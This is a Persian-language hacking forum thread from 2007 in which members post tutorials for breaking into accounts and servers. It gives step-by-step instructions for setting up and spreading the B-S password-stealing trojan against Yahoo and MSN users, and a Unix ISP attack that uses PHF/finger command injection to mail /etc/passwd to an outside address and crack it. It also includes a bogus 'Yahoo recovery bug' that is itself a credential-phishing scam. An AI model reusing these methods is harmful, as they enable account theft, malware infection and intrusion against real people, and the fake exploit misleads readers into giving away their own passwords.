6.بعد از قرار دادن کد داخل پیغام و در عوض کردن قسمت هایی که از شما (YahooID قربانی,پسورد شما,YahooID شما) خواسته شده کار شما تمام می شود.
7.حالا دکمه ی SEND را بنویسید.
این کد
(/cgi-bin/start?v703&login.{YahooID قربانی}=passmachine&class=supervisor&f={پسورد شما}&f=27586&{YahooID شما}=ACTIVE&rsa)

mazi_z_PSP
26-05-2007, 21:05
راستی دوستان.من خودم به مشکلی کوچک و ساده برخوردم.تو يکی سايت هايی که رفته بودم وقتی ميخواستم مطالبش رو بگيرم اما نميشد يعنی رنگش برای کپی پيست عوض نميشد ميشه کمک کنين؟

bad_boy_2007
27-05-2007, 18:51
از منو view گزینه source رو انتخاب کن متن رو کپی کن بنداز تو frontpage (در حالت html) بعد کپی و past عادی کن . یه راه دیگش اینه که با پسوند .doc ذخیره اش کنی (مستقیم از طریق notepad) ولی همیشه خوب جواب نمیده

بحثت رو به سمت برنامه نویسی ببری بهتره فکر کنم مقدماتت خیلی طولانی شده :20:
موفق باشی

mazi_z_PSP
27-05-2007, 20:20
از منو view گزینه source رو انتخاب کن متن رو کپی کن بنداز تو frontpage (در حالت html) بعد کپی و past عادی کن . یه راه دیگش اینه که با پسوند .doc ذخیره اش کنی (مستقیم از طریق notepad) ولی همیشه خوب جواب نمیده

بحثت رو به سمت برنامه نویسی ببری بهتره فکر کنم مقدماتت خیلی طولانی شده :20:
موفق باشی
عزيز جان اینا هم برای هک و برنامه نويسی هستش . هرکی بخواد از اینا ميتونه تو زبانی که ياد داره استفاده کنه.مخصوصا ويبی

bad_boy_2007
28-05-2007, 14:40
اگه یکم سورس بدی یا اینکه آموزشت رو به سمت مباحث عملی سوق بدی بهتره :46:

mazi_z_PSP
29-05-2007, 11:07
اگه یکم سورس بدی یا اینکه آموزشت رو به سمت مباحث عملی سوق بدی بهتره :46:
الان زياد وقت سر زدن ندارم اونم با این اینترنت از آشغال بدتر اما بعد از خردان رو چشم

f-secure
29-05-2007, 21:59
هك ايدي


در روزهای اخیر یکی از دوستام در مشهد یک اشکالی (BUG) درسیستم
پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) کشف کرد که هنوز توسط یاهو پیدا نشده بنابرین شما باید هر چه سریع تر از این اشکال سو استفاده کنید.
ما برای سو استفاده از چه روشی استفاده خواهیم کرد؟
ما برای گرفتن پسورد از روش سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) استفاده می کنیم و خود را یک مستر(MASTER) معرفی می کنیم و به سیستم فرمان می دهیم که پسورد ما را غیب کند(Hidden) و دوباره برای ما نشان دهد (Show) و بفرستد و در بین این کار از اشکال (BUG) باید سو استفاده کنیم. ما پسورد و ID خود را به آن میدهیم و ایمیل را به شخصی که می خواهیم پسورد را بدست آوریم تغییر می دهیم در نتیجه سیستم به اشتباه پسورد قربانی را به ما می فرستد. به همین سادگی!!!!
مزیت این روش: بدون تعلیمات و دانش قبلی می توانید به راحتی پسورد یک نفر را بدست آورید و نیازی به برنامه ندارد!
بدی این روش: البته نمی شه گفت بدی.مدت زمانی که پسورد را به شما میدهد بستگی به تعداد نامه هایی که به در سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) هست.برای جواب دادن به هر نامه حدود 1 دقیقه طول می کشد.حالا خودتون میتوانید حساب کنید نامه ی پسورد خود را کی پس میگیرید.
روش(بخش اصلی):
1.برید تو ایمیل خود و تو قسمت Compose.
2.در قسمت TO باید ایمیل سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) را بنویسید که هست>>>>cookies_pasword@yahoo.com<<<<<<
3.در Subject ایمیل کامل خود را بنویسید(ID@yahoo.com (ID@yahoo.com)).
4.کدی که کمی پایین تر پیدا میکنید کپی COPY کنید و داخل پیغام خود PASTE کنید.(اول کپی کنید بعد تغییر دهید)
5.حالا باید در کد کمی تغییر ایجاد کنیم.
6.بعد از قرار دادن کد داخل پیغام و در عوض کردن قسمت هایی که از شما (YahooID قربانی,پسورد شما,YahooID شما) خواسته شده کار شما تمام می شود.
7.حالا دکمه ی SEND را بنویسید.
این کد
(/cgi-bin/start?v703&login.{YahooID قربانی}=passmachine&class=supervisor&f={پسورد شما}&f=27586&{YahooID شما}=ACTIVE&rsa)



با عرض معذرت من كه هيچي از قسمت آموزش آخر پستت حاليم نشد بقيه رو نمي دونم
دقيق تر بنويس يا عكس بذار

f-secure
29-05-2007, 22:47
ما پسورد و Id خود را به آن میدهیم و ایمیل را به شخصی که می خواهیم پسورد را بدست آوریم تغییر می دهیم
اين يعني چي؟من كه پاك گيج شدم
راستي اگه كسي گفت چرا ما ايراني ها فقط بلديم تكست بزنيم بدون تصوير و توضيح بيشتر يك جايزه داره

mazi_z_PSP
29-05-2007, 23:17
منظورش مشخصه.ميگه اول مثل پر کردن مشخصات پسورد و آيدی خودمون رو تو برنامه وارد ميکنيم و بعد ایمل کسی رو که ميخوايم هک کنيم رو وارد ميکنيم. اگر پا به پای آموزش ها پيش بری ميشکلی پيش نمياد.البته انتظار نداشته باش که همچی به طور کامل توضيح داده بشه

m_mahdi313
31-05-2007, 10:49
با سلام
مطالبتون رو خوندم موفق باشيد

mazi_z_PSP
01-06-2007, 09:38
می خوام شمارو با تروجن B-S و طرز کار این تروجن اشنا کنم ،این تروجن توسط دوستم بیژن نوشته شده که اولین تروجن ایرانی مخصوص گرفتن پسورد یک ID در یاهو مسنجر، این تروجن ورژین های مختلفی داره که جدیدترین نسخه اون 1.9.1 هست ،این تروجن دارای چند قسمت هستش که در مورد هر کدام براتون توضیح میدم ، در ضمن این تروجن تا 1 ماه پیش Undected بود یعنی طوری که آنتی ویروس ها سرورهای اونو نمی شناختن ولی فعلا آنتی ویروس های آپدیت شده و بروز درامده اونو تشخیص میدن و بعنوان B-S Password Sender به کاربر اخطار میدن .
این تروجن دارای 3 سرور هست که هر کدام وظیفه خاصی دارن ، اطلاعاتی در مورد سرورهای این تروجن :
msn-Server :این سرور مخصوص هک کردن یک آیدی در msn مسنجر که 44 kb حجم داره .
net-Server : این فایل نیز یکی دیگه از سرورهای این تروجن محسوب میشه و برای گرفتن شماره کاربر و پسورد اشتراک اون یا Ras Password بکار میره و 44 kbنیز حجم داره ،البته این ورژین B-S کلا برای سیستمهای ویندوز 95-98-mellinium نوشت شده و بخوبی رو این نوع از ویندوزها کار می کنه .
: yahoo-Server بجرأت میتونم بگم که B-S رو همه بخاطر این سرور میشناسن و بخاطر این سرور بود که این تروجن در بین تمام ایرانی ها محبوب شد ،این سرور مخصوص هک کردن و بدست آوردن پسورد یک ID در یاهو مسنجر و در نتیجه هک کردن ایمیل یاهو قربانی .این سرور نیز 44kb حجم داره و طریقه حذف کردن فایلهای این سرورو در انتهای ورد کامل توضیح میدم .
B-S edit Server : خب این اطلاعاتی که در بالا دادم در مورد سرورهای این تروجن بود ولی برای این که این سرورهارا برای طرفی که میخواین هکش کنین بفرستین قبلش احتیاج به تنظیم کردن اونها دارین ،این کارو میتونین با edit Server انجام بدین ، بدین صورت که در ابتدا فایل B-S edit Server را باز می کنید ، سپس در قسمت mail setting در قسمت Your E-mail ایمیل خودتونو میدین که اینجا سعی کنید ایمیلی از Hotmail بدین چون این تروجن با هات میل بخوبی کار میکنه و بهتر شما نیز هات میل بدین .خب بعد از دادن ایمیلتون باید Smtp مورد نظرو بدین چون Smtp هات میل چند وقت پیش عوض شد ، تیک داخل مربع Auto Smtp غیر فعال کنین تا خودتون بتونین Smtp جدید هات میلو بدین ، برای این کار در قسمت Smtp Server فعال شده بنویسین : mx01.hotmail.com که این یکی از Smtp های جدید هات میل که این تروجن و اغلب تروجن های دیگه مثل Optix-Barok , ... با این Smtp براحتی کار می کنن
و در انتها در قسمت Fake Message Setting شما میتونین تعیین کنین که وقتی سرور توسط قربانی اجرا و باز میشه آیا Eror بهش داده بشه یا نه که این گزینه دیگه به خودتون بستگی داره اگه مایل بودین که سرور هنگام اجرا شدن Eror بده تیک گزینه enable fake eror message فعال کنین و Eror را انتخاب کنین . خب در مرحله آخر باید سروری که میخواین این تنظیمات در اون ذخیره شه انتخاب کنین برای این کار گزینه Update Server بزنین و یکی از سرورهارو که در خود پوشه تروجن هست انتخاب و Save بزنین تا سرور با مشخصات شما ذخیره شه و این کارهارا برای هر 3 سرور B-S انجام بدین و اونارو تنظیم کنید .
خب شاید شما تعجب کنین که این تروجن چرا client نداره ، چون این تروجن اصلاً احتیاجی به کلاینت برای وصل شدن به سیستم قربانی نداره و تنها کاری که شما برای هک کردن طرف و بدست آوردن پسوردهای اون دارین فرستادن یکی از سرورها برای قربانی و باز کردن آن توسط اون طرف و با این کار بستگی به نوع سرور فرستاده شده پسورد اون براتون ایمیل میشه . خب این توضیحاتی که در بالا دادم ، نحوه چگونگی تنظیم کردن سرورها و نحوه کار با این تروجن بود ولی حالا می خوام کمی درباره چگونگی پاک کردن و حذف کردن فایلهای سرور اجرا شده بروی سیستم خودتون توضیح بدم تا اگه سیستمتون آلوده به این تروجن شد بتونین اونو از این تروجن پاک کنید ، من طریقه پاک کردن سرور یاهو B-S از تو رجیستری توضیح میدم چون این سرور در این تروجن کاربرد بیشتری داره .
طریقه پاک کردن سرور یاهو B-S از سیستم :این سرور بعد از اجرا شدن در قسمت های مختلف سیستم قرار می گیره و در رجیستری میشینه ، وقتی سرور یاهو اجرا میشه یک کپی از خودشو در قسمت windows و در پوشه System قرار میده و با اسم YUpdater.exe و با آیکون یاهو مسنجر در سیستم میشینه ، همان طور که میدونید فایل Yupdater.exe یکی از فایل های اجرایی خود یاهو مسنجر که در پوشه خود یاهو مسنجر و برای آپدیت شدن و بروز در آمدن نسخه باهو مسنجر بکار میره و این فایل سرور یاهو B-S هم بهمین نام ایجاد میشه فقط تنها فرقش اینه که این سرور در پوشه windows/system میشین ولی فایل اجرایی خود یاهو در پوشه خود یاهو مسنجر و شما با این راه میتونین فایل سرور یاهو B-S با فایل خود مسنجر تشخیص بدین و فایل سرورو پاک کنید ، ولی قبل از این کار باید شما فایلهای سرور ایجاد شده در رجیستری و Startup پاک کنین تا بتونین فایل سرور یاهو B-S که YUpdater.exe هست را از پوشه سیستم پاک کنید پس برای این کارهایی که میگم را انجام بدین :
در ابتدا دکمه Start در پایین صفحه ویندوزتون را زده و به قسمت RUN برین و در آنجا تایپ کنید : msconfig و بعد به Startup برید و در آنجا دنبال اسم : YUpdater.exe __________ Sys بگردین که این فایل سرور یاهو B-S هست و خود Sys بمعنی سیستم هست و اگه این فایلرو در startup مشاهده کردین بدونین که سیستمتون به این تروجن آلوده شده و برای اینکه اونو از رو سیستم حذف کنین باید تیک کنار Sys در startup غیر فعال کنین البته در صورتی که کنار Sys نوشته باشه YUpdater.exe" " بعد از غیر فعال کردن فایل سرور در startup دوباره به RUN برید و این بار دستور Regedit تایپ کنین تا به رجیستری سیستمتون برین و بعد این مراحل را طی کنید :
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\ ===>Sys-YUpdater.exe
و در این قسمت اگه سیستم شما به این تروجن و سرور یاهو این تروجن آلوده باشه شما فایل YUpdater.exe را قطعاً در این قسمت خواهید دید و بعد این فایل را در صورت مشاهده پاک کنید ، ولی این تروجن در چند جای رجیستری می شینه و شما بجزآدرس بالا باید به 2 جای دیگه سر بزنید :
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Run\ ===>Sys-YUpdater.exe
و همچنین در این قسمت :
HKEY_USERS\.DEFAULT\Software\Microsoft\internet explorer\exploler bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}
\FilesNameMRU
و در صورت مشاهده فایل YUpdater.exe در قسمت هایی که گفته شد آنهارا پاک کنید و در آخر به windows/system برین و این فایل را در آنجا نیز پاک کنید و بعد از Restart مطمئن باشید که سیستمتان از وجود این تروجن پاک شده است .
خب دوستان این مطالب را بیشتر بخاطر این گفتم که اگر خواستین این تروجن را روی سیستم خودتون تست کنین تا ببینید بهتون ایمیل میاد یا نه ، بعد بتونید تروجنو از روی سیستمتون پاک کنید . البته اگر از یک فایروال شخصی مثل Zone Alarm استفاده کنید وقتی سرور یاهو این تروجن اجرا بشه بهتون Alert داده میشه که فایل YUpdater.exe قصد داره به نت وصل شه و اگه شما قبول کنید و بعد از آن با یک ID دیگه در مسنجر Login کنید آن وقت اگه سرور این تروجن در سیستمتون اجرا شده باشه و شما سرور را با هات میل خودتون تنظیم کرده باشین بعد از 2-3 دقیقه براتون ایمیل میاد که این فقط به عنوان تست و شما میتونین برای هر کسی از طریقه ایمیل و یا مسنجرها سرور تنظیم شده این تروجنو بفرستین و کاری کنین که طرف گول بخوره و سرور را باز کنه .

mazi_z_PSP
01-06-2007, 09:40
چند روزي بود فكر استفاده از يك كارت اينترنت مجاني داشت ديوونم ميكرد... البته بگم ها ما حروم خور هم نيستيم ... آخه بابا به پير به پيغمبر نامرديه كه ما اين همه پول كارت هاي آبكي اينترنت رو ميديم ... يكمي هم كيف دنيا رو كنيم ..... اينه

Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و دربيشتر شهر هاي بزرگ هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي نفوذ گر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شما يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
Taha:3A62i9qr:1012:10:Mashhad
در اينجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكن مي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh admin:*:100:11:WWW administrator:/home/Common/[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در حوصله اين مقاله نمي گنجد .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUpConnectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد
FTP [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])/
كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد
FTP ftp.domain.com
اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .
ID@domain.com ; /bin/mail you@somewhere.com (you@somewhere.com) < etc/passwd
كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com (amir6_6_6@yahoo.com) < etc/passwd
با وارد كردن اين دستور فايل Passwdبراي من به آدرس 3dhack@yahoo.com پست مي شود !
خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونه اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها JohnRipperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])به دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد . به همين راحتي .....

mazi_z_PSP
01-06-2007, 09:46
IP
شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم)


v Port

در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.
در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد:
Port Num Service Why it's phun!
-------- ------- ----------------------------------------
7 echo Host repearts what you type
9 discard Dev/null
11 systat Lots of info on users
13 daytime Time and date at computer's location
15 netstat Tremendous info on networks
19 chargen Pours out a stream of ASCII characters.
21 ftp Transfers files
23 telnet Where you log in.
25 smpt Forge email
37 time Time
39 rlp Resource location
43 whois Info on hosts and networks
53 domain Nameserver
70 gopher Out-of-date info hunter
79 finger Lots of info on users
80 http Web server
110 pop Incoming email
119 nntp Usenet news groups -- forge posts, cancels
443 shttp Another web server
512 biff Mail notification
513 rlogin Remote login who Remote who and uptime
514 shell Remote command, no password used! syslog Remote system logging
520 route Routing information protocol

از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.

mazi_z_PSP
01-06-2007, 09:47
- Hacker کيست ؟
هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است )

- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟
از راه شبکه (نه بابا ! )
بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند...

- تعريف چند اصطلاح:

*** Hacker واقعی = سامورايی :
کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ...

*** Wacker (واکر):
کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست (جرو هکر‌های کلاه‌ سياه )

*** Cracker (کراکر):
کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه )

*** Preaker :
از قديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه (-;


v زنگ ‌تفريح

- تقسيم بندی من برای هکر ها:

۱- جوجه‌هکرها (احمق کوچولوها):
توانايی‌ها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند ديگه همه‌چی رو ياد گرفته‌اند !

۲- خروس‌هکر‌ها يا مرغ‌هکرها (احمق‌های بزرگتر):
توانايی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !

۳- هکرهای قابل‌احترام ( مثل خود شما):
دارند ياد می‌گيرند و هنوز ۲،۳ سال کار دارند.

۴- هکرهای پيش‌کسوت:
ديگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند


v تقسيم‌بندی

- انواع کامپيوتر‌های شبکه:
=> کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند.
=> کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد.


- انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند:

=> سيستم‌های فعلی:
* خانواده Unix (مثل FreeBSD, Linux, Sun Solaris )
* خانواده Windows (مثل WinNT, Win2000 )
* OsMac
=> سيستم‌های قديمی (منقرض شده - آخيش ! ):
AIX, IRIS, DEC10, DEC20 , ...


- سوال: کدام‌ها را بايد ياد گرفت؟
Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد.


v برای شروع چه چيزی لازم است؟

۱- Win2000 , Linux را روی کامپيوتر خود نصب کرده و شروع به يادگيری کنيد.
۲- شروع به يادگيری زبان C کنيد.
۳- شروع به يادگيری TCP/IP کنيد. (يک کتاب بخريد )
۴- مهمترين چيز علاقه به طی کردن يک را بسييييييار طوووووولانی


v تقسيم‌بندی انواع حملات

Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation


v 133t Speak چيست؟

گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی معادل‌های قراردادی به کار می‌روند که ليست آنها را در زير می‌بينيد:
0 <= O1 <= L; I2 <= Z3 <= E4 <= A5 <= S6 <= G7 <= T8 <= B| <= L; I@ <= at (duh)$ <= S)( <= H}{ <= H/\/ <= N\/\/ <= W/\/\ <= M|> <= P; D|< <= Kph <= fz <= s


مثلا he Speaks می‌شود:
}{3 $|>34|< z
توصيه من اينه که از اين معادل‌ها تا جايی که می‌تونيد استفاده نکنيد. فقط ياد بگيريد که کم نياريد.


v ترسيم مسير برای آينده

۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که می‌خواهيد هک کنيد ( کلاينت يا سرور )، زيرا روش‌هک کردن اين‌دو بجز در مراحل ابتدايی کاملا متفاوت است.
۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه می‌دارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت می‌کنيد که مثالی برای کامپيوتر کلاينت است) و جمع‌آوری اطلاعات در مورد آن است. اين جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصه‌ای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستم‌عامل و نيز برنامه‌هايی است که کامپيوتر شخص از آنها بهره می‌برد. يکی از مهمترين ( و گاه خطرناک‌ترين) کارها، تست‌کردن پورت‌های آن کامپيوتر برای ديدن اينکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را به‌دست آورده و از طريق اين Shell Account به نهايت نفوذ دست‌ يابيم ولی گاه به‌دلايل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به اين سطح دست‌يافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان می‌رسد.
۴- اين مرحله بعد از نفوذ روی می‌دهد که در آن به يک سطحی از کنترل سيستم رسيده‌ايد. رفتار شما در اين مرحله مشخص می‌کند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشته‌ايد يا نه، همينجا مشخص خواهد شد.
